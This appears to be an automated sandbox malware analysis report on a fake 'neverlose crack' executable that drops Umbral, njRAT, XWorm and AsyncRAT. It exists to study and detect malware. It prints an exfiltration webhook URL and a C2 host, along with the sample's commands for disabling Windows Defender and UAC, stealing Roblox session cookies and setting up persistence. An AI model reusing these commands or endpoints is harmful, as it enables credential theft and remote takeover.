Analysis
-
max time kernel
30s -
max time network
31s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
02-09-2024 09:18
Static task
static1
Behavioral task
behavioral1
Sample
neverlose crack.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral2
Sample
neverlose crack.exe
Resource
win7-20240705-en
Behavioral task
behavioral3
Sample
neverlose crack.exe
Resource
win10-20240404-en
General
-
Target
neverlose crack.exe
-
Size
295KB
-
MD5
01cc2b2bcef2f12ab9a10905f999027d
-
SHA1
c62bb9b1532dc3f8638cc1ab5eb3b5f5185c2b40
-
SHA256
d51154dab49e7c3199cb9fd75aa5c7f9eb58ed74c8ea5eb40601ee484dc0b578
-
SHA512
025af3ae3fa059e364ef933cff47327436f08fb18379377caf7e71ced86f2c8adb4f56a79a643f3072c21b06e9e9b97f5945b9bdff1d29e798c6d9a5c3360d5c
-
SSDEEP
6144:DVOuy8Et9vsiTzIpoOhYyC8M4i7jyVvdOe4BWH5Y5/zu4cCGb19e:bFigGOTCz17jy9Yer6dzIpi
Malware Config
Extracted
umbral
https://discord.com/api/webhooks/1273828074898718851/qR9eE6omxJxFL_jVry1J18IsVQ6bHhsk5rGr5VLxyO-92VJHyGPK43BBNMWtaUG56gE2
Extracted
njrat
<- NjRAT 0.7d Horror Edition ->
Victim
meeting-compound.gl.at.ply.gg:1504
f8ff2d3def0ea5927a14148fb1c0ef4a
-
reg_key
f8ff2d3def0ea5927a14148fb1c0ef4a
-
splitter
Y262SUCZ4UJJ
Extracted
xworm
meeting-compound.gl.at.ply.gg:44256
-
Install_directory
%AppData%
-
install_file
USB.exe
Extracted
asyncrat
Victim
127.0.0.1:1504
127.0.0.1:44256
meeting-compound.gl.at.ply.gg:1504
meeting-compound.gl.at.ply.gg:44256
-
delay
1
-
install
true
-
install_file
System.exe
-
install_folder
%AppData%
Signatures
-
Detect Umbral payload 2 IoCs
resource yara_rule behavioral4/memory/4580-47-0x0000025110110000-0x0000025110150000-memory.dmp family_umbral behavioral4/files/0x00070000000234b3-37.dat family_umbral -
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral4/files/0x0009000000023454-4.dat family_xworm behavioral4/memory/1904-40-0x0000000000EC0000-0x0000000000ED6000-memory.dmp family_xworm -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Async RAT payload 1 IoCs
resource yara_rule behavioral4/files/0x00070000000234b2-15.dat family_asyncrat -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
pid Process 1960 powershell.exe 2116 powershell.exe 548 powershell.exe 1052 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts Umbral.exe -
Sets file to hidden 1 TTPs 2 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 2696 attrib.exe 736 attrib.exe -
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation Payload.exe Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation neverlose crack.exe Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation INSTALLER1.exe Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation WizClient.exe Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation WmZWbh4b.exe -
Drops startup file 4 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WizClient.lnk WizClient.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WizClient.lnk WizClient.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f8ff2d3def0ea5927a14148fb1c0ef4a.exe dllhost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f8ff2d3def0ea5927a14148fb1c0ef4a.exe dllhost.exe -
Executes dropped EXE 8 IoCs
pid Process 1904 WizClient.exe 3880 INSTALLER1.exe 4580 Umbral.exe 524 WmZWbh4b.exe 4864 Payload.exe 932 System.exe 2632 dllhost.exe 2116 $77svchost.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\f8ff2d3def0ea5927a14148fb1c0ef4a = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\dllhost.exe\" .." dllhost.exe Set value (str) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WizClient = "C:\\Users\\Admin\\AppData\\Roaming\\WizClient.exe" WizClient.exe Set value (str) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\f8ff2d3def0ea5927a14148fb1c0ef4a = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\dllhost.exe\" .." dllhost.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 23 discord.com 24 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 9 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language neverlose crack.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Payload.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dllhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 1972 cmd.exe 4524 PING.EXE -
Delays execution with timeout.exe 2 IoCs
pid Process 544 timeout.exe 3724 timeout.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1004 wmic.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 4008 reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 4524 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3716 schtasks.exe 4404 schtasks.exe 3944 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3880 INSTALLER1.exe 3880 INSTALLER1.exe 3880 INSTALLER1.exe 3880 INSTALLER1.exe 3880 INSTALLER1.exe 3880 INSTALLER1.exe 3880 INSTALLER1.exe 3880 INSTALLER1.exe 3880 INSTALLER1.exe 3880 INSTALLER1.exe 3880 INSTALLER1.exe 3880 INSTALLER1.exe 3880 INSTALLER1.exe 3880 INSTALLER1.exe 3880 INSTALLER1.exe 3880 INSTALLER1.exe 3880 INSTALLER1.exe 3880 INSTALLER1.exe 3880 INSTALLER1.exe 3880 INSTALLER1.exe 3880 INSTALLER1.exe 3880 INSTALLER1.exe 3880 INSTALLER1.exe 3880 INSTALLER1.exe 3880 INSTALLER1.exe 3880 INSTALLER1.exe 3880 INSTALLER1.exe 4580 Umbral.exe 3880 INSTALLER1.exe 3880 INSTALLER1.exe 3880 INSTALLER1.exe 3880 INSTALLER1.exe 3880 INSTALLER1.exe 3880 INSTALLER1.exe 3880 INSTALLER1.exe 3880 INSTALLER1.exe 3880 INSTALLER1.exe 3880 INSTALLER1.exe 3880 INSTALLER1.exe 3880 INSTALLER1.exe 1052 powershell.exe 1052 powershell.exe 1960 powershell.exe 1960 powershell.exe 2116 powershell.exe 2116 powershell.exe 3680 powershell.exe 3680 powershell.exe 524 WmZWbh4b.exe 524 WmZWbh4b.exe 524 WmZWbh4b.exe 524 WmZWbh4b.exe 524 WmZWbh4b.exe 524 WmZWbh4b.exe 524 WmZWbh4b.exe 524 WmZWbh4b.exe 524 WmZWbh4b.exe 524 WmZWbh4b.exe 524 WmZWbh4b.exe 524 WmZWbh4b.exe 524 WmZWbh4b.exe 524 WmZWbh4b.exe 524 WmZWbh4b.exe 524 WmZWbh4b.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1904 WizClient.exe Token: SeDebugPrivilege 4580 Umbral.exe Token: SeIncreaseQuotaPrivilege 2696 wmic.exe Token: SeSecurityPrivilege 2696 wmic.exe Token: SeTakeOwnershipPrivilege 2696 wmic.exe Token: SeLoadDriverPrivilege 2696 wmic.exe Token: SeSystemProfilePrivilege 2696 wmic.exe Token: SeSystemtimePrivilege 2696 wmic.exe Token: SeProfSingleProcessPrivilege 2696 wmic.exe Token: SeIncBasePriorityPrivilege 2696 wmic.exe Token: SeCreatePagefilePrivilege 2696 wmic.exe Token: SeBackupPrivilege 2696 wmic.exe Token: SeRestorePrivilege 2696 wmic.exe Token: SeShutdownPrivilege 2696 wmic.exe Token: SeDebugPrivilege 2696 wmic.exe Token: SeSystemEnvironmentPrivilege 2696 wmic.exe Token: SeRemoteShutdownPrivilege 2696 wmic.exe Token: SeUndockPrivilege 2696 wmic.exe Token: SeManageVolumePrivilege 2696 wmic.exe Token: 33 2696 wmic.exe Token: 34 2696 wmic.exe Token: 35 2696 wmic.exe Token: 36 2696 wmic.exe Token: SeIncreaseQuotaPrivilege 2696 wmic.exe Token: SeSecurityPrivilege 2696 wmic.exe Token: SeTakeOwnershipPrivilege 2696 wmic.exe Token: SeLoadDriverPrivilege 2696 wmic.exe Token: SeSystemProfilePrivilege 2696 wmic.exe Token: SeSystemtimePrivilege 2696 wmic.exe Token: SeProfSingleProcessPrivilege 2696 wmic.exe Token: SeIncBasePriorityPrivilege 2696 wmic.exe Token: SeCreatePagefilePrivilege 2696 wmic.exe Token: SeBackupPrivilege 2696 wmic.exe Token: SeRestorePrivilege 2696 wmic.exe Token: SeShutdownPrivilege 2696 wmic.exe Token: SeDebugPrivilege 2696 wmic.exe Token: SeSystemEnvironmentPrivilege 2696 wmic.exe Token: SeRemoteShutdownPrivilege 2696 wmic.exe Token: SeUndockPrivilege 2696 wmic.exe Token: SeManageVolumePrivilege 2696 wmic.exe Token: 33 2696 wmic.exe Token: 34 2696 wmic.exe Token: 35 2696 wmic.exe Token: 36 2696 wmic.exe Token: SeDebugPrivilege 3880 INSTALLER1.exe Token: SeDebugPrivilege 3880 INSTALLER1.exe Token: SeDebugPrivilege 1052 powershell.exe Token: SeDebugPrivilege 1960 powershell.exe Token: SeDebugPrivilege 2116 powershell.exe Token: SeBackupPrivilege 4508 vssvc.exe Token: SeRestorePrivilege 4508 vssvc.exe Token: SeAuditPrivilege 4508 vssvc.exe Token: SeDebugPrivilege 3680 powershell.exe Token: SeDebugPrivilege 524 WmZWbh4b.exe Token: SeIncreaseQuotaPrivilege 3516 wmic.exe Token: SeSecurityPrivilege 3516 wmic.exe Token: SeTakeOwnershipPrivilege 3516 wmic.exe Token: SeLoadDriverPrivilege 3516 wmic.exe Token: SeSystemProfilePrivilege 3516 wmic.exe Token: SeSystemtimePrivilege 3516 wmic.exe Token: SeProfSingleProcessPrivilege 3516 wmic.exe Token: SeIncBasePriorityPrivilege 3516 wmic.exe Token: SeCreatePagefilePrivilege 3516 wmic.exe Token: SeBackupPrivilege 3516 wmic.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1904 WizClient.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 448 wrote to memory of 1904 448 neverlose crack.exe 84 PID 448 wrote to memory of 1904 448 neverlose crack.exe 84 PID 448 wrote to memory of 3880 448 neverlose crack.exe 86 PID 448 wrote to memory of 3880 448 neverlose crack.exe 86 PID 448 wrote to memory of 4580 448 neverlose crack.exe 87 PID 448 wrote to memory of 4580 448 neverlose crack.exe 87 PID 448 wrote to memory of 524 448 neverlose crack.exe 88 PID 448 wrote to memory of 524 448 neverlose crack.exe 88 PID 448 wrote to memory of 4864 448 neverlose crack.exe 89 PID 448 wrote to memory of 4864 448 neverlose crack.exe 89 PID 448 wrote to memory of 4864 448 neverlose crack.exe 89 PID 4580 wrote to memory of 2696 4580 Umbral.exe 91 PID 4580 wrote to memory of 2696 4580 Umbral.exe 91 PID 4580 wrote to memory of 4672 4580 Umbral.exe 94 PID 4580 wrote to memory of 4672 4580 Umbral.exe 94 PID 4580 wrote to memory of 1052 4580 Umbral.exe 96 PID 4580 wrote to memory of 1052 4580 Umbral.exe 96 PID 3880 wrote to memory of 2748 3880 INSTALLER1.exe 97 PID 3880 wrote to memory of 2748 3880 INSTALLER1.exe 97 PID 3880 wrote to memory of 4104 3880 INSTALLER1.exe 99 PID 3880 wrote to memory of 4104 3880 INSTALLER1.exe 99 PID 4104 wrote to memory of 3724 4104 cmd.exe 102 PID 4104 wrote to memory of 3724 4104 cmd.exe 102 PID 2748 wrote to memory of 3716 2748 cmd.exe 103 PID 2748 wrote to memory of 3716 2748 cmd.exe 103 PID 4580 wrote to memory of 1960 4580 Umbral.exe 104 PID 4580 wrote to memory of 1960 4580 Umbral.exe 104 PID 4580 wrote to memory of 2116 4580 Umbral.exe 106 PID 4580 wrote to memory of 2116 4580 Umbral.exe 106 PID 1904 wrote to memory of 4404 1904 WizClient.exe 108 PID 1904 wrote to memory of 4404 1904 WizClient.exe 108 PID 4580 wrote to memory of 3680 4580 Umbral.exe 112 PID 4580 wrote to memory of 3680 4580 Umbral.exe 112 PID 4580 wrote to memory of 3516 4580 Umbral.exe 117 PID 4580 wrote to memory of 3516 4580 Umbral.exe 117 PID 524 wrote to memory of 736 524 WmZWbh4b.exe 119 PID 524 wrote to memory of 736 524 WmZWbh4b.exe 119 PID 524 wrote to memory of 2696 524 WmZWbh4b.exe 121 PID 524 wrote to memory of 2696 524 WmZWbh4b.exe 121 PID 4580 wrote to memory of 3840 4580 Umbral.exe 123 PID 4580 wrote to memory of 3840 4580 Umbral.exe 123 PID 4580 wrote to memory of 3024 4580 Umbral.exe 125 PID 4580 wrote to memory of 3024 4580 Umbral.exe 125 PID 4580 wrote to memory of 548 4580 Umbral.exe 127 PID 4580 wrote to memory of 548 4580 Umbral.exe 127 PID 4104 wrote to memory of 932 4104 cmd.exe 130 PID 4104 wrote to memory of 932 4104 cmd.exe 130 PID 4580 wrote to memory of 1004 4580 Umbral.exe 131 PID 4580 wrote to memory of 1004 4580 Umbral.exe 131 PID 4580 wrote to memory of 1972 4580 Umbral.exe 133 PID 4580 wrote to memory of 1972 4580 Umbral.exe 133 PID 1972 wrote to memory of 4524 1972 cmd.exe 135 PID 1972 wrote to memory of 4524 1972 cmd.exe 135 PID 4864 wrote to memory of 2632 4864 Payload.exe 136 PID 4864 wrote to memory of 2632 4864 Payload.exe 136 PID 4864 wrote to memory of 2632 4864 Payload.exe 136 PID 2632 wrote to memory of 4672 2632 dllhost.exe 140 PID 2632 wrote to memory of 4672 2632 dllhost.exe 140 PID 2632 wrote to memory of 4672 2632 dllhost.exe 140 PID 2632 wrote to memory of 1512 2632 dllhost.exe 142 PID 2632 wrote to memory of 1512 2632 dllhost.exe 142 PID 2632 wrote to memory of 1512 2632 dllhost.exe 142 PID 2632 wrote to memory of 3944 2632 dllhost.exe 144 PID 2632 wrote to memory of 3944 2632 dllhost.exe 144 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 4 IoCs
pid Process 4672 attrib.exe 736 attrib.exe 2696 attrib.exe 4672 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\neverlose crack.exe"C:\Users\Admin\AppData\Local\Temp\neverlose crack.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:448 -
C:\Users\Admin\AppData\Local\Temp\WizClient.exe"C:\Users\Admin\AppData\Local\Temp\WizClient.exe"2⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1904 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WizClient" /tr "C:\Users\Admin\AppData\Roaming\WizClient.exe"3⤵
- Scheduled Task/Job: Scheduled Task
PID:4404
-
-
-
C:\Users\Admin\AppData\Local\Temp\INSTALLER1.exe"C:\Users\Admin\AppData\Local\Temp\INSTALLER1.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3880 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "System" /tr '"C:\Users\Admin\AppData\Roaming\System.exe"' & exit3⤵
- Suspicious use of WriteProcessMemory
PID:2748 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "System" /tr '"C:\Users\Admin\AppData\Roaming\System.exe"'4⤵
- Scheduled Task/Job: Scheduled Task
PID:3716
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp9EC0.tmp.bat""3⤵
- Suspicious use of WriteProcessMemory
PID:4104 -
C:\Windows\system32\timeout.exetimeout 34⤵
- Delays execution with timeout.exe
PID:3724
-
-
C:\Users\Admin\AppData\Roaming\System.exe"C:\Users\Admin\AppData\Roaming\System.exe"4⤵
- Executes dropped EXE
PID:932
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4580 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2696
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"3⤵
- Views/modifies file attributes
PID:4672
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1052
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 23⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1960
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2116
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3680
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3516
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory3⤵PID:3840
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵PID:3024
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER3⤵
- Command and Scripting Interpreter: PowerShell
PID:548
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name3⤵
- Detects videocard installed
PID:1004
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:1972 -
C:\Windows\system32\PING.EXEping localhost4⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4524
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WmZWbh4b.exe"C:\Users\Admin\AppData\Local\Temp\WmZWbh4b.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:524 -
C:\Windows\System32\attrib.exe"C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\Exec"3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:736
-
-
C:\Windows\System32\attrib.exe"C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\Exec\$77svchost.exe"3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:2696
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpF7AE.tmp.bat""3⤵PID:1188
-
C:\Windows\system32\timeout.exetimeout 34⤵
- Delays execution with timeout.exe
PID:544
-
-
C:\Users\Admin\Exec\$77svchost.exe"C:\Users\Admin\Exec\$77svchost.exe"4⤵
- Executes dropped EXE
PID:2116
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Payload.exe"C:\Users\Admin\AppData\Local\Temp\Payload.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4864 -
C:\Users\Admin\AppData\Local\Temp\dllhost.exe"C:\Users\Admin\AppData\Local\Temp\dllhost.exe"3⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2632 -
C:\Windows\SysWOW64\attrib.exeattrib +h "C:\Users\Admin\AppData\Local\Temp\dllhost.exe"4⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:4672
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn CleanSweepCheck /f4⤵
- System Location Discovery: System Language Discovery
PID:1512
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn CleanSweepCheck /tr C:\Users\Admin\AppData\Local\Temp\dllhost.exe4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3944
-
-
C:\Windows\SysWOW64\cmd.execmd /c reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f4⤵
- System Location Discovery: System Language Discovery
PID:5036 -
C:\Windows\SysWOW64\reg.exereg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f5⤵
- UAC bypass
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:4008
-
-
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4508
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Hide Artifacts
2Hidden Files and Directories
2Impair Defenses
1Disable or Modify Tools
1Modify Registry
3Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
948B
MD51a58f982c18490e622e00d4eb75ace5a
SHA160c30527b74659ecf09089a5a7c02a1df9a71b65
SHA2564b7f800c0dea209162cc86627983993127eb20e3f8616646c41cb3ce15d9b39d
SHA512ddab516a967783c5951717853aa5b3ef6dd5b442db50092888b2e7f3179fc68120fcde69a08d6ab280740eaadb6eadfc758c3118b52706f869e48ac1aebda480
-
Filesize
1KB
MD588be3bc8a7f90e3953298c0fdbec4d72
SHA1f4969784ad421cc80ef45608727aacd0f6bf2e4b
SHA256533c8470b41084e40c5660569ebbdb7496520d449629a235e8053e84025f348a
SHA5124fce64e2dacddbc03314048fef1ce356ee2647c14733da121c23c65507eeb8d721d6b690ad5463319b364dc4fa95904ad6ab096907f32918e3406ef438a6ef7c
-
Filesize
1KB
MD5ec79fae4e7c09310ebf4f2d85a33a638
SHA1f2bdd995b12e65e7ed437d228f22223b59e76efb
SHA256e9c4723a5fe34e081c3d2f548a1d472394cc7aa58056fcf44ca542061381243a
SHA512af9dda12f6bb388d826fe03a4a8beed9bda23a978aa55a2af6a43271660ee896a7ee3bcf2c4d2f1e6180902791d8c23560f1c2ec097a501d8c6f4f6c49075625
-
Filesize
944B
MD56d42b6da621e8df5674e26b799c8e2aa
SHA1ab3ce1327ea1eeedb987ec823d5e0cb146bafa48
SHA2565ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c
SHA51253faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29
-
Filesize
63KB
MD56c575ec28ef4f6108f2acf9775938100
SHA1c3b5d9f59b53768817d3c6dd93a49cef5a40a9e2
SHA256609d9f9c8da8f777e17ff1a716c07e39e3b2d7fd76086436cf2e2383fe8bcd8c
SHA512950f48b90492b7f0ac702c2cfd8822eab510819024fbcba2407217280e9d069c39aeae27f4bd6e6ce37efc9de52fad52ad15a07b8ce43c58f43bb5926278ddd5
-
Filesize
54KB
MD529527eb6dd3c1e2b8dbc17d70ad1fb20
SHA18fafd2e9914b32797c957f58a1254afc7dccf5af
SHA256dafc09f9798d4c1134845b08749c514a3478ed4a45837e12fd717012ec27c694
SHA51252e315cd12482d8a147e5d810e7fbb116cc15b4163e3015f5d579b0621980a15195a4354528bce24a3aff1e47766d95dea71f09563da8e43c781020006bb0e00
-
Filesize
229KB
MD562099472f40d33f1caf73e36e866b9e7
SHA19d1e27b780ba14d0e41d366d79b0f42d4a782e7e
SHA256f343ca46350a3c48f888be39bf1247fcab2bcd731889fc16828aac5f681edebc
SHA5123356bd93afdff76dfc995b8bba3fc96d772e371c3ae6f289cbdb58cffef4906a5f8c2755152765c8cc96b5fc61e97186e42eceaa5e8619d15e172441c95f9764
-
Filesize
61KB
MD5d63d40b2af636f58cfbabe878e42f0a7
SHA13f97fb34eceff4e64cd3adb6f5cb4f1fabaf06ed
SHA256536699ce7a068f324c719b4f429bf0aefb82602fcc18ca4d99d76aa53fbdb19a
SHA512e8d771744ad9b2fc85b6f7c655f0e24bd0e42fa4a6575ed4e3301c325750c6e52dbc0b8565b30adf1303986d026d9a4d6a936a9093be8707a8ddbac7933242b4
-
Filesize
40KB
MD547f267290124f530b9c04563b533db83
SHA1fccb81909c612554fce4303daeffc750a71ee44e
SHA256479db498a032418957c1616b13187402d7f626afa32dd4fcf56313d78ec23eeb
SHA512a81b1ca99fec7a536eabc62f57668e46b832e534ccba43f3ab25a9d33d394745d24bad5f72225244f20be5ddcb44529d72efa31b92bc9e03f34e3b9ddb4f9e3a
-
